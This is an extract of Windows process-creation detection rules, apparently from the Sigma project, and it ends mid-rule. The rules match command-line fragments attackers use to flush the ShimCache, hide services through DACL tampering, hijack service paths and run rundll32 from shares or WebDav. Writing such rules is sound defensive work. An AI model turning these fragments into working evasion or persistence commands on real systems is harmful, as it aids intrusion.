    "content": "title: ShimCache Flush\nid: b0524451-19af-4efa-a46f-562a977f792e\nstatus: stable\ndescription: Detects actions that clear the local ShimCache and remove forensic evidence\nreferences:\n    - https://medium.com/@blueteamops/shimcache-flush-89daff28d15e\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1a:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'apphelp.dll'\n    selection1b:\n        CommandLine|contains:\n            - 'ShimFlushCache'\n            - '#250'\n    selection2a:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'kernel32.dll'\n    selection2b:\n        CommandLine|contains:\n            - 'BaseFlushAppcompatCache'\n            - '#46'\n    condition: ( selection1a and selection1b ) or ( selection2a and selection2b )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_sys.yml",
    "content": "title: Suspicious Rundll32 Activity Invoking Sys File\nid: 731231b9-0b5d-4219-94dd-abb6959aa7ea\nstatus: test\ndescription: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: 'rundll32.exe'\n    selection2:\n        CommandLine|contains:\n            - '.sys,'\n            - '.sys '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml",
    "content": "title: Potentially Suspicious Rundll32.EXE Execution of UDL File\nid: 0ea52357-cd59-4340-9981-c46c7e900428\nstatus: test\ndescription: |\n    Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.\n    Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.\nreferences:\n    - https://trustedsec.com/blog/oops-i-udld-it-again\nauthor: '@kostastsale'\ndate: 2024-08-16\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1218.011\n    - attack.t1071\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\explorer.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'oledb32.dll'\n            - ',OpenDSLFile '\n            - '\\\\Users\\\\*\\\\Downloads\\\\' # Note: You can adjust the path to the download directory or other directories according to your environment.\n        CommandLine|endswith: '.udl'\n    condition: all of selection_*\nfalsepositives:\n    - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml",
    "content": "title: Rundll32 UNC Path Execution\nid: 5cdb711b-5740-4fb2-ba88-f7945027afac\nstatus: test\ndescription: Detects rundll32 execution where the DLL is located on a remote location (share)\nreferences:\n    - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli:\n        CommandLine|contains: ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml",
    "content": "title: Rundll32 Execution With Uncommon DLL Extension\nid: c3a99af4-35a9-4668-879e-c09aeb4f2bdf\nstatus: test\ndescription: Detects the execution of rundll32 with a command line that doesn't contain a common extension\nreferences:\n    - https://twitter.com/mrd0x/status/1481630810495139841?s=12\nauthor: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou\ndate: 2022-01-13\nmodified: 2024-04-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    filter_main_null:\n        CommandLine: null\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_known_extension:\n        - CommandLine|contains:\n              # Note: This aims to cover: single and double quotes in addition to spaces and comma \",\" usage.\n              - '.cpl '\n              - '.cpl,'\n              - '.cpl\"'\n              - \".cpl'\"\n              - '.dll '\n              - '.dll,'\n              - '.dll\"'\n              - \".dll'\"\n              - '.inf '\n              - '.inf,'\n              - '.inf\"'\n              - \".inf'\"\n        - CommandLine|endswith:\n              # Note: This aims to cover: single and double quotes in addition to spaces and comma \",\" usage.\n              - '.cpl'\n              - '.dll'\n              - '.inf'\n    filter_main_localserver:\n        CommandLine|contains: ' -localserver '\n    filter_main_zzzzInvokeManagedCustomActionOutOfProc:\n        ParentImage|endswith: '\\msiexec.exe'\n        CommandLine|contains|all:\n            - ':\\Windows\\Installer\\'\n            - '.tmp'\n            - 'zzzzInvokeManagedCustomActionOutOfProc'\n    filter_optional_EdgeUpdate:\n        ParentCommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{'\n            - '\\EDGEMITMP_'\n            - '.tmp\\setup.exe'\n            - '--install-archive='\n            - '--previous-version='\n            - '--msedgewebview --verbose-logging --do-not-launch-msedge --user-level'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml",
    "content": "title: Suspicious Workstation Locking via Rundll32\nid: 3b5b0213-0460-4e3f-8937-3abf98ff7dcc\nstatus: test\ndescription: Detects a suspicious call to the user32.dll function that locks the user workstation\nreferences:\n    - https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/\nauthor: frack113\ndate: 2022-06-04\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_call_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_call_parent:\n        ParentImage|endswith: '\\cmd.exe'\n    selection_call_cli:\n        CommandLine|contains: 'user32.dll,'\n    selection_function:\n        CommandLine|contains: 'LockWorkStation'\n    condition: all of selection_*\nfalsepositives:\n    - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml",
    "content": "title: WebDav Client Execution Via Rundll32.EXE\nid: 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5\nstatus: test\ndescription: |\n    Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like \"C:\\windows\\system32\\davclnt.dll,DavSetCookie\".\n    This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/17\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\svchost.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains: 'C:\\windows\\system32\\davclnt.dll,DavSetCookie'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml",
    "content": "title: Suspicious WebDav Client Execution Via Rundll32.EXE\nid: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555\nstatus: test\ndescription: |\n    Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\nreferences:\n    - https://twitter.com/aceresponder/status/1636116096506818562\n    - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/\n    - https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/\n    - https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png\n    - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2023-03-16\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - cve.2023-23397\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        ParentCommandLine|contains: '-s WebClient'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'C:\\windows\\system32\\davclnt.dll,DavSetCookie'\n        CommandLine|re: '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'\n    filter_local_ips:\n        CommandLine|contains:\n            - '://10.' # 10.0.0.0/8\n            - '://192.168.' # 192.168.0.0/16\n            - '://172.16.' # 172.16.0.0/12\n            - '://172.17.'\n            - '://172.18.'\n            - '://172.19.'\n            - '://172.20.'\n            - '://172.21.'\n            - '://172.22.'\n            - '://172.23.'\n            - '://172.24.'\n            - '://172.25.'\n            - '://172.26.'\n            - '://172.27.'\n            - '://172.28.'\n            - '://172.29.'\n            - '://172.30.'\n            - '://172.31.'\n            - '://127.' # 127.0.0.0/8\n            - '://169.254.' # 169.254.0.0/16\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml",
    "content": "title: Rundll32 Execution Without Parameters\nid: 5bb68627-3198-40ca-b458-49f973db8752\nstatus: test\ndescription: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module\nreferences:\n    - https://bczyz1.github.io/2021/01/30/psexec.html\nauthor: Bartlomiej Czyz, Relativity\ndate: 2021-01-31\nmodified: 2023-02-28\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1570\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine:\n            - 'rundll32.exe'\n            - 'rundll32'\n    condition: selection\nfalsepositives:\n    - False positives may occur if a user called rundll32 from CLI with no options\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_runonce_execution.yml",
    "content": "title: Run Once Task Execution as Configured in Registry\nid: 198effb6-6c98-4d0c-9ea3-451fa143c45c\nstatus: test\ndescription: This rule detects the execution of Run Once task as configured in the registry\nreferences:\n    - https://twitter.com/pabraeken/status/990717080805789697\n    - https://lolbas-project.github.io/lolbas/Binaries/Runonce/\n    - https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA\nauthor: 'Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)'\ndate: 2020-10-18\nmodified: 2022-12-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\runonce.exe'\n        - Description: 'Run Once Wrapper'\n    selection_cli:\n        - CommandLine|contains: '/AlternateShellStartup'\n        - CommandLine|endswith: '/r'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml",
    "content": "title: Possible Privilege Escalation via Weak Service Permissions\nid: d937b75f-a665-4480-88a5-2f20e9f9b22a\nstatus: test\ndescription: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://pentestlab.blog/2017/03/30/weak-service-permissions/\nauthor: Teymur Kheirkhabarov\ndate: 2019-10-26\nmodified: 2024-12-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    scbynonadmin:\n        Image|endswith: '\\sc.exe'\n        IntegrityLevel:\n            - 'Medium'\n            - 'S-1-16-8192'\n    selection_binpath:\n        CommandLine|contains|all:\n            - 'config'\n            - 'binPath'\n    selection_failure:\n        CommandLine|contains|all:\n            - 'failure'\n            - 'command'\n    condition: scbynonadmin and 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_create_service.yml",
    "content": "title: New Service Creation Using Sc.EXE\nid: 85ff530b-261d-48c6-a441-facaa2e81e48\nrelated:\n    - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 # Using PowerShell\n      type: similar\nstatus: test\ndescription: Detects the creation of a new service using the \"sc.exe\" utility.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2023-02-20\nmodified: 2025-09-01\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'create'\n            - 'binPath'\n    filter_optional_dropbox:\n        ParentImage|startswith:\n            - 'C:\\Program Files (x86)\\Dropbox\\Client\\'\n            - 'C:\\Program Files\\Dropbox\\Client\\'\n        ParentImage|endswith: '\\Dropbox.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administrator or user creates a service for legitimate reasons.\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_disable_service.yml",
    "content": "title: Service StartupType Change Via Sc.EXE\nid: 85c312b7-f44d-4a51-a024-d671c40b49fc\nstatus: test\ndescription: Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"\nreferences:\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-03-04\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' config '\n            - 'start'\n        CommandLine|contains:\n            - 'disabled'\n            - 'demand'\n    condition: all of selection_*\nfalsepositives:\n    - False positives may occur with troubleshooting scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml",
    "content": "title: New Kernel Driver Via SC.EXE\nid: 431a1fdb-4799-4f3b-91c3-a683b003fc49\nstatus: test\ndescription: Detects creation of a new service (kernel driver) with the type \"kernel\"\nreferences:\n    - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-14\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains:\n            - 'create'\n            - 'config'\n        CommandLine|contains|all:\n            - 'binPath'\n            - 'type'\n            - 'kernel'\n    filter_optional_avira_driver:\n        - CommandLine|contains|all:\n              - 'create netprotection_network_filter'\n              - 'type= kernel start= '\n              - 'binPath= System32\\drivers\\netprotection_network_filter'\n              - 'DisplayName= netprotection_network_filter'\n              - 'group= PNP_TDI tag= yes'\n        - CommandLine|contains|all:\n              - 'create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys'\n              - 'type=kernel start=boot error=critical group=Early-Launch'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Rare legitimate installation of kernel drivers via sc.exe\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml",
    "content": "title: Interesting Service Enumeration Via Sc.EXE\nid: e83e8899-c9b2-483b-b355-5decc942b959\nstatus: test\ndescription: |\n    Detects the enumeration and query of interesting and in some cases sensitive services on the system via \"sc.exe\".\n    Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.\nreferences:\n    - https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\n    - https://pentestlab.blog/tag/svchost/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-02-12\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: 'query'\n    selection_cmd:\n        # Note: add more interesting services\n        CommandLine|contains: 'termservice'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\n# Note: can be upgraded to medium after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml",
    "content": "title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE\nid: 6c8fbee5-dee8-49bc-851d-c3142d02aa47\nrelated:\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Generic SD tampering\n      type: similar\nstatus: test\ndescription: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.\nreferences:\n    - https://twitter.com/0gtweet/status/1628720819537936386\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_sdset:\n        CommandLine|contains|all:\n            - 'sdset'\n            - 'A;' # Allow Access\n    selection_trustee:\n        CommandLine|contains:\n            - ';IU' # Interactively logged-on user\n            - ';SU' # Service logon user\n            - ';BA' # Built-in administrators\n            - ';SY' # Local system\n            - ';WD' # Everyone\n    filter_optional_hexnode:\n        ParentImage: 'C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml",
    "content": "title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE\nid: 99cf1e02-00fb-4c0d-8375-563f978dfd37\nrelated:\n    - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering\n      type: similar\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique\n      type: similar\nstatus: test\ndescription: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.\nreferences:\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings\nauthor: Jonhnathan Ribeiro, oscd.community\ndate: 2020-10-16\nmodified: 2023-02-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_sdset:\n        CommandLine|contains|all:\n            - 'sdset'\n            - 'D;' # Deny Access\n    selection_trustee:\n        CommandLine|contains:\n            - ';IU' # Interactively logged-on user\n            - ';SU' # Service logon user\n            - ';BA' # Built-in administrators\n            - ';SY' # Local system\n            - ';WD' # Everyone\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml",
    "content": "title: Service DACL Abuse To Hide Services Via Sc.EXE\nid: a537cfc3-4297-4789-92b5-345bfd845ad0\nrelated:\n    - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access\n      type: similar\n    - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering\n      type: similar\nstatus: test\ndescription: Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.\nreferences:\n    - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-12-20\nmodified: 2022-08-08\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'sdset'\n            # Summary of permissions\n            #   DC: Delete All Child Objects\n            #   LC: List Contents\n            #   WP: Write All Properties\n            #   DT: Delete Subtree\n            #   SD: Delete\n            - 'DCLCWPDTSD'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml",
    "content": "title: Service Security Descriptor Tampering Via Sc.EXE\nid: 98c5aeef-32d5-492f-b174-64a691896d25\nrelated:\n    - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access\n      type: similar\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique\n      type: similar\nstatus: test\ndescription: Detection of sc.exe utility adding a new service with special permission which hides that service.\nreferences:\n    - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://twitter.com/0gtweet/status/1628720819537936386\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: 'sdset'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml",
    "content": "title: Suspicious Service Path Modification\nid: 138d3531-8793-4f50-a2cd-f291b2863d78\nstatus: test\ndescription: Detects service path modification via the \"sc\" binary to a suspicious command or path\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nauthor: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-21\nmodified: 2022-11-18\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'config'\n            - 'binPath'\n        CommandLine|contains:\n            # Add more suspicious commands or binaries\n            - 'powershell'\n            - 'cmd '\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'rundll32'\n            - 'svchost'\n            - 'dllhost'\n            - 'cmd.exe /c'\n            - 'cmd.exe /k'\n            - 'cmd.exe /r'\n            - 'cmd /c'\n            - 'cmd /k'\n            - 'cmd /r'\n            # Add more suspicious paths\n            - 'C:\\Users\\Public'\n            - '\\Downloads\\'\n            - '\\Desktop\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - 'C:\\Windows\\TEMP\\'\n            - '\\AppData\\Local\\Temp'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml",
    "content": "title: Potential Persistence Attempt Via Existing Service Tampering\nid: 38879043-7e1e-47a9-8d46-6bec88e201df\nstatus: test\ndescription: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.\nreferences:\n    - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/\nauthor: Sreeman\ndate: 2020-09-29\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1543.003\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        - CommandLine|contains|all:\n              - 'sc '\n              - 'config '\n              - 'binpath='\n        - CommandLine|contains|all:\n              - 'sc '\n              - 'failure'\n              - 'command='\n    selection_reg_img:\n        - CommandLine|contains|all:\n              - 'reg '\n              - 'add '\n              - 'FailureCommand'\n        - CommandLine|contains|all:\n              - 'reg '\n              - 'add '\n              - 'ImagePath'\n    selection_reg_ext:\n        CommandLine|contains:\n            - '.sh'\n            - '.exe'\n            - '.dll'\n            - '.bin$'\n            - '.bat'\n            - '.cmd'\n            - '.js'\n            - '.msh$'\n            - '.reg$'\n            - '.scr'\n            - '.ps'\n            - '.vb'\n            - '.jar'\n            - '.pl'\n    condition: selection_sc or all of selection_reg_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_stop_service.yml",
    "content": "title: Stop Windows Service Via Sc.EXE\nid: 81bcb81b-5b1f-474b-b373-52c871aaa7b1\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\nstatus: test\ndescription: Detects the stopping of a Windows service via the \"sc.exe\" utility\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-05\nmodified: 2024-01-18\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'sc.exe'\n        - Image|endswith: '\\sc.exe'\n    selection_cli:\n        CommandLine|contains: ' stop '\n    condition: all of selection_*\nfalsepositives:\n    - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml",
    "content": "title: Suspicious Schtasks Execution AppData Folder\nid: c5c00f49-b3f9-45a6-997e-cfdecc6e1967\nstatus: test\ndescription: 'Detects the creation of a schtask that executes a file from C:\\Users\\<USER>\\AppData\\Local'\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-03-15\nmodified: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/Create'\n            - '/RU'\n            - '/TR'\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\'\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space\n    filter:\n        # FP from test set in 